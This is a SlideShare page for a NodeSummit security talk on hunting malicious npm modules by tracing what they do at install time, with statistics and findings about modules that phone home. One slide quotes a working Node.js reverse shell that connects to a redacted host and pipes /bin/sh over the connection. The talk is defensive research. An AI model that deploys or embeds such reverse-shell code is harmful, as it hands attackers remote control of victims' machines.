SlideShare a Scribd company logo

Hunting for malicious modules in npm - NodeSummit

Adam Baldwin
Adam Baldwin

Ever since the threat of an npm worm became public we've been thinking about how to detect malicious modules in our ecosystem and how to provide security teams auditing modules with tooling and intel to make informed decisions about module risk. We've built a system to analyze modules based on their installation behavior. This talk will discuss the results of this endeavor and share the interesting findings from this new and previously unexplored dataset and try to answer the question if a npm worm is lurking in the shadows.

Technology
1 of 45
Download to read offline
Hunting for Malicious Modules in
adam_baldwin evilpacket
liftsecurity.io
nodesecurity.io Continous Security Monitoring
Hunting for Malicious Modules in
WHY SHOULD WE HUNT?
🕯 Hey, I can publish malicious code to npm
💨 this is bad.
🔥 install scripts are BAD!
💩 JavaScript BAD!
rimrafall
npm hydra worm
WHAT ARE WE HUNTING?
WHAT DEFINES MALICIOUS BEHAVIOR?
var net = require('net'); var daemon = require('daemon'); var spawn = require('child_process').spawn; function c() { var client = new net.Socket(); client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []); client.write("Connectedrn"); client.pipe(sh.stdin); sh.stdout.pipe(client); }); client.on('error', function() {}); client.on('close', function() { setTimeout(c, 5000); }); } require('daemon')(); c(); 😈 Example
client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []);
WHERE ARE WE HUNTING?
507,573 modules
3,443,784 individual versions
242,505,822 individual files
21,756 modules with install scripts
HOW AM I HUNTING?
MIRROR REGISTRY
INDEX MODULES Filenames Extensions Content Hash
npm install module syscall capture DB
npm publish GCS PubSubInstrumentation npm i raw data 🎉
~24,000 modules processed
2.1 TB OF DATA 😲
22 53 80 443 1880 3000 9418 23400 27017 38584 54329 61337 3001 3306 4987 6379 8000 8002 8008 8043 8080 8090 9000 9001 DESTINATION PORTS
DNS REQUESTS 339 unique lookups
DESTINATION HOSTS 1080 unique hosts
RESULTS 😈
144+ modules that download build components over HTTP Insecure Behavior
Modules that called home et_phone_home anarchy harmlesspackage botbait
Modules that change registry settings
😇 ? 😈
😢 / 😀
WHAT DID I LEARN? How can we improve the future
People will publish malicious things to the registry
Your security habits have a lot to do with if this gets exploited or not
-Have good passwords -Don't publish credentials -Limit the # of publishers
But what about ? Can't they do something?
</presentation> Thanks adam_baldwin evilpacket

Recommended

cpanfileがRubyでパースできることに気づいた俺たちは
cpanfileがRubyでパースできることに気づいた俺たちはcpanfileがRubyでパースできることに気づいた俺たちは
cpanfileがRubyでパースできることに気づいた俺たちはTakafumi ONAKA
 
FOSDEM 2012: Practical implementation of promise theory in CFEngine
FOSDEM 2012: Practical implementation of promise theory in CFEngineFOSDEM 2012: Practical implementation of promise theory in CFEngine
FOSDEM 2012: Practical implementation of promise theory in CFEnginedottedmag
 
Star bed 2018.07.19
Star bed 2018.07.19Star bed 2018.07.19
Star bed 2018.07.19Ruo Ando
 
Chromium Embedded Framework + Go at Brooklyn JS
Chromium Embedded Framework + Go at Brooklyn JSChromium Embedded Framework + Go at Brooklyn JS
Chromium Embedded Framework + Go at Brooklyn JSquirkey
 
Puppet Camp 2012
Puppet Camp 2012Puppet Camp 2012
Puppet Camp 2012Server Density
 
Node workShop Basic
Node workShop BasicNode workShop Basic
Node workShop BasicCaesar Chi
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingEric Hogue
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDDEric Hogue
 

Recommended

cpanfileがRubyでパースできることに気づいた俺たちは
cpanfileがRubyでパースできることに気づいた俺たちはcpanfileがRubyでパースできることに気づいた俺たちは
cpanfileがRubyでパースできることに気づいた俺たちはTakafumi ONAKA
 
FOSDEM 2012: Practical implementation of promise theory in CFEngine
FOSDEM 2012: Practical implementation of promise theory in CFEngineFOSDEM 2012: Practical implementation of promise theory in CFEngine
FOSDEM 2012: Practical implementation of promise theory in CFEnginedottedmag
 
Star bed 2018.07.19
Star bed 2018.07.19Star bed 2018.07.19
Star bed 2018.07.19Ruo Ando
 
Chromium Embedded Framework + Go at Brooklyn JS
Chromium Embedded Framework + Go at Brooklyn JSChromium Embedded Framework + Go at Brooklyn JS
Chromium Embedded Framework + Go at Brooklyn JSquirkey
 
Puppet Camp 2012
Puppet Camp 2012Puppet Camp 2012
Puppet Camp 2012Server Density
 
Node workShop Basic
Node workShop BasicNode workShop Basic
Node workShop BasicCaesar Chi
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingEric Hogue
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDDEric Hogue
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.jsWebsecurify
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHPEric Hogue
 
Anyevent
AnyeventAnyevent
AnyeventMarian Marinov
 
Serenity Now
Serenity NowSerenity Now
Serenity NowDaniel MacTough
 
Async programming on NET
Async programming on NETAsync programming on NET
Async programming on NETyuyijq
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Eric Hogue
 
Devel::NYTProf::Apache
Devel::NYTProf::ApacheDevel::NYTProf::Apache
Devel::NYTProf::ApacheTokuhiro Matsuno
 
I love Automation
I love AutomationI love Automation
I love AutomationTakayuki Miyauchi
 
Xdebug - Your first, last, and best option for troubleshooting PHP code
Xdebug - Your first, last, and best option for troubleshooting PHP codeXdebug - Your first, last, and best option for troubleshooting PHP code
Xdebug - Your first, last, and best option for troubleshooting PHP codeAdam Englander
 
Diff
DiffDiff
Diffyosuke_shimada
 
Aspdevice - Asp Fast Crud introdution
Aspdevice - Asp Fast Crud introdutionAspdevice - Asp Fast Crud introdution
Aspdevice - Asp Fast Crud introdutionAdriano Mendes
 
Autobots @ REA
Autobots @ REAAutobots @ REA
Autobots @ REAggiesemann
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBSqreen
 
Metis - RubyConf 2011 Lightning Talk
Metis - RubyConf 2011 Lightning TalkMetis - RubyConf 2011 Lightning Talk
Metis - RubyConf 2011 Lightning TalkKen Robertson
 
clara-rules
clara-rulesclara-rules
clara-rulesIkuru Kanuma
 
Spark手把手:[e2-spk-s03]
Spark手把手:[e2-spk-s03]Spark手把手:[e2-spk-s03]
Spark手把手:[e2-spk-s03]Erhwen Kuo
 
Sge
SgeSge
SgeChris Roeder
 
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...Gosuke Miyashita
 
Postman On Steroids
Postman On SteroidsPostman On Steroids
Postman On SteroidsSara Tornincasa
 
Puppet and Openshift
Puppet and OpenshiftPuppet and Openshift
Puppet and OpenshiftGareth Rushgrove
 
evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdffortmdu
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Aleksandr Yampolskiy
 

More Related Content

What's hot

Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.jsWebsecurify
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHPEric Hogue
 
Async programming on NET
Async programming on NETAsync programming on NET
Async programming on NETyuyijq
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Eric Hogue
 
Xdebug - Your first, last, and best option for troubleshooting PHP code
Xdebug - Your first, last, and best option for troubleshooting PHP codeXdebug - Your first, last, and best option for troubleshooting PHP code
Xdebug - Your first, last, and best option for troubleshooting PHP codeAdam Englander
 
Aspdevice - Asp Fast Crud introdution
Aspdevice - Asp Fast Crud introdutionAspdevice - Asp Fast Crud introdution
Aspdevice - Asp Fast Crud introdutionAdriano Mendes
 
Autobots @ REA
Autobots @ REAAutobots @ REA
Autobots @ REAggiesemann
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBSqreen
 
Metis - RubyConf 2011 Lightning Talk
Metis - RubyConf 2011 Lightning TalkMetis - RubyConf 2011 Lightning Talk
Metis - RubyConf 2011 Lightning TalkKen Robertson
 
Spark手把手:[e2-spk-s03]
Spark手把手:[e2-spk-s03]Spark手把手:[e2-spk-s03]
Spark手把手:[e2-spk-s03]Erhwen Kuo
 
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...Gosuke Miyashita
 

What's hot (20)

Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHP
 
Anyevent
AnyeventAnyevent
Anyevent
 
Serenity Now
Serenity NowSerenity Now
Serenity Now
 
Async programming on NET
Async programming on NETAsync programming on NET
Async programming on NET
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014
 
Devel::NYTProf::Apache
Devel::NYTProf::ApacheDevel::NYTProf::Apache
Devel::NYTProf::Apache
 
I love Automation
I love AutomationI love Automation
I love Automation
 
Xdebug - Your first, last, and best option for troubleshooting PHP code
Xdebug - Your first, last, and best option for troubleshooting PHP codeXdebug - Your first, last, and best option for troubleshooting PHP code
Xdebug - Your first, last, and best option for troubleshooting PHP code
 
Diff
DiffDiff
Diff
 
Aspdevice - Asp Fast Crud introdution
Aspdevice - Asp Fast Crud introdutionAspdevice - Asp Fast Crud introdution
Aspdevice - Asp Fast Crud introdution
 
Autobots @ REA
Autobots @ REAAutobots @ REA
Autobots @ REA
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDB
 
Metis - RubyConf 2011 Lightning Talk
Metis - RubyConf 2011 Lightning TalkMetis - RubyConf 2011 Lightning Talk
Metis - RubyConf 2011 Lightning Talk
 
clara-rules
clara-rulesclara-rules
clara-rules
 
Spark手把手:[e2-spk-s03]
Spark手把手:[e2-spk-s03]Spark手把手:[e2-spk-s03]
Spark手把手:[e2-spk-s03]
 
Sge
SgeSge
Sge
 
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...
 
Postman On Steroids
Postman On SteroidsPostman On Steroids
Postman On Steroids
 
Puppet and Openshift
Puppet and OpenshiftPuppet and Openshift
Puppet and Openshift
 

Similar to Hunting for malicious modules in npm - NodeSummit

evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdffortmdu
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Aleksandr Yampolskiy
 
SSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and SchedulingSSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and SchedulingDavid Evans
 
Automated code audits
Automated code auditsAutomated code audits
Automated code auditsDamien Seguy
 
Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats notMoseStaton39
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QACreating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QAarchwisp
 
Putting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps ToolchainPutting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps ToolchainJames Wickett
 
Be Mean to Your Code
Be Mean to Your CodeBe Mean to Your Code
Be Mean to Your CodeJames Wickett
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP
 
Артем Маркушев - JavaScript
Артем Маркушев - JavaScriptАртем Маркушев - JavaScript
Артем Маркушев - JavaScriptDataArt
 
Insecure coding in C (and C++)
Insecure coding in C (and C++)Insecure coding in C (and C++)
Insecure coding in C (and C++)Olve Maudal
 
Test driven node.js
Test driven node.jsTest driven node.js
Test driven node.jsJay Harris
 
Keep it simple web development stack
Keep it simple web development stackKeep it simple web development stack
Keep it simple web development stackEric Ahn
 
Kraken Front-Trends
Kraken Front-TrendsKraken Front-Trends
Kraken Front-TrendsPayPal
 
Future Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NETFuture Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NETGianluca Carucci
 

Similar to Hunting for malicious modules in npm - NodeSummit (20)

evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdf
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?
 
SSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and SchedulingSSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and Scheduling
 
Automated code audits
Automated code auditsAutomated code audits
Automated code audits
 
Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not Test flawfinder. This program wont compile or run; thats not
Test flawfinder. This program wont compile or run; thats not
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Node.JS security
Node.JS securityNode.JS security
Node.JS security
 
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QACreating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
 
Putting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps ToolchainPutting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps Toolchain
 
Be Mean to Your Code
Be Mean to Your CodeBe Mean to Your Code
Be Mean to Your Code
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...
 
Артем Маркушев - JavaScript
Артем Маркушев - JavaScriptАртем Маркушев - JavaScript
Артем Маркушев - JavaScript
 
Insecure coding in C (and C++)
Insecure coding in C (and C++)Insecure coding in C (and C++)
Insecure coding in C (and C++)
 
Test driven node.js
Test driven node.jsTest driven node.js
Test driven node.js
 
Keep it simple web development stack
Keep it simple web development stackKeep it simple web development stack
Keep it simple web development stack
 
Kraken Front-Trends
Kraken Front-TrendsKraken Front-Trends
Kraken Front-Trends
 
Node.js
Node.jsNode.js
Node.js
 
Future Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NETFuture Decoded - Node.js per sviluppatori .NET
Future Decoded - Node.js per sviluppatori .NET
 

More from Adam Baldwin

Attacking open source using abandoned resources
Attacking open source using abandoned resourcesAttacking open source using abandoned resources
Attacking open source using abandoned resourcesAdam Baldwin
 
JavaScript Supply Chain Security
JavaScript Supply Chain SecurityJavaScript Supply Chain Security
JavaScript Supply Chain SecurityAdam Baldwin
 
Building a Threat Model & How npm Fits Into It
Building a Threat Model & How npm Fits Into ItBuilding a Threat Model & How npm Fits Into It
Building a Threat Model & How npm Fits Into ItAdam Baldwin
 
Continuous Security - Thunderplains 2016
Continuous Security - Thunderplains 2016Continuous Security - Thunderplains 2016
Continuous Security - Thunderplains 2016Adam Baldwin
 
Continuous Security
Continuous SecurityContinuous Security
Continuous SecurityAdam Baldwin
 
The Art of Identifying Vulnerabilities - CascadiaFest 2015
The Art of Identifying Vulnerabilities - CascadiaFest 2015The Art of Identifying Vulnerabilities - CascadiaFest 2015
The Art of Identifying Vulnerabilities - CascadiaFest 2015Adam Baldwin
 
Node Day - Node.js Security in the Enterprise
Node Day - Node.js Security in the EnterpriseNode Day - Node.js Security in the Enterprise
Node Day - Node.js Security in the EnterpriseAdam Baldwin
 
Node Security Project - LXJS 2013
Node Security Project - LXJS 2013Node Security Project - LXJS 2013
Node Security Project - LXJS 2013Adam Baldwin
 
Security First - Adam Baldwin
Security First - Adam BaldwinSecurity First - Adam Baldwin
Security First - Adam BaldwinAdam Baldwin
 
JSConf 2013 Builders vs Breakers
JSConf 2013 Builders vs BreakersJSConf 2013 Builders vs Breakers
JSConf 2013 Builders vs BreakersAdam Baldwin
 
EV1LSHA - Misadventures in the land of Lua
EV1LSHA - Misadventures in the land of LuaEV1LSHA - Misadventures in the land of Lua
EV1LSHA - Misadventures in the land of LuaAdam Baldwin
 
Writing an (in)secure webapp in 3 easy steps
Writing an (in)secure webapp in 3 easy stepsWriting an (in)secure webapp in 3 easy steps
Writing an (in)secure webapp in 3 easy stepsAdam Baldwin
 
Pony Pwning Djangocon 2010
Pony Pwning Djangocon 2010Pony Pwning Djangocon 2010
Pony Pwning Djangocon 2010Adam Baldwin
 

More from Adam Baldwin (14)

Attacking open source using abandoned resources
Attacking open source using abandoned resourcesAttacking open source using abandoned resources
Attacking open source using abandoned resources
 
JavaScript Supply Chain Security
JavaScript Supply Chain SecurityJavaScript Supply Chain Security
JavaScript Supply Chain Security
 
Building a Threat Model & How npm Fits Into It
Building a Threat Model & How npm Fits Into ItBuilding a Threat Model & How npm Fits Into It
Building a Threat Model & How npm Fits Into It
 
Continuous Security - Thunderplains 2016
Continuous Security - Thunderplains 2016Continuous Security - Thunderplains 2016
Continuous Security - Thunderplains 2016
 
Continuous Security
Continuous SecurityContinuous Security
Continuous Security
 
Nodevember 2015
Nodevember 2015Nodevember 2015
Nodevember 2015
 
The Art of Identifying Vulnerabilities - CascadiaFest 2015
The Art of Identifying Vulnerabilities - CascadiaFest 2015The Art of Identifying Vulnerabilities - CascadiaFest 2015
The Art of Identifying Vulnerabilities - CascadiaFest 2015
 
Node Day - Node.js Security in the Enterprise
Node Day - Node.js Security in the EnterpriseNode Day - Node.js Security in the Enterprise
Node Day - Node.js Security in the Enterprise
 
Node Security Project - LXJS 2013
Node Security Project - LXJS 2013Node Security Project - LXJS 2013
Node Security Project - LXJS 2013
 
Security First - Adam Baldwin
Security First - Adam BaldwinSecurity First - Adam Baldwin
Security First - Adam Baldwin
 
JSConf 2013 Builders vs Breakers
JSConf 2013 Builders vs BreakersJSConf 2013 Builders vs Breakers
JSConf 2013 Builders vs Breakers
 
EV1LSHA - Misadventures in the land of Lua
EV1LSHA - Misadventures in the land of LuaEV1LSHA - Misadventures in the land of Lua
EV1LSHA - Misadventures in the land of Lua
 
Writing an (in)secure webapp in 3 easy steps
Writing an (in)secure webapp in 3 easy stepsWriting an (in)secure webapp in 3 easy steps
Writing an (in)secure webapp in 3 easy steps
 
Pony Pwning Djangocon 2010
Pony Pwning Djangocon 2010Pony Pwning Djangocon 2010
Pony Pwning Djangocon 2010
 

Recently uploaded

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 

Recently uploaded (20)

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 

Hunting for malicious modules in npm - NodeSummit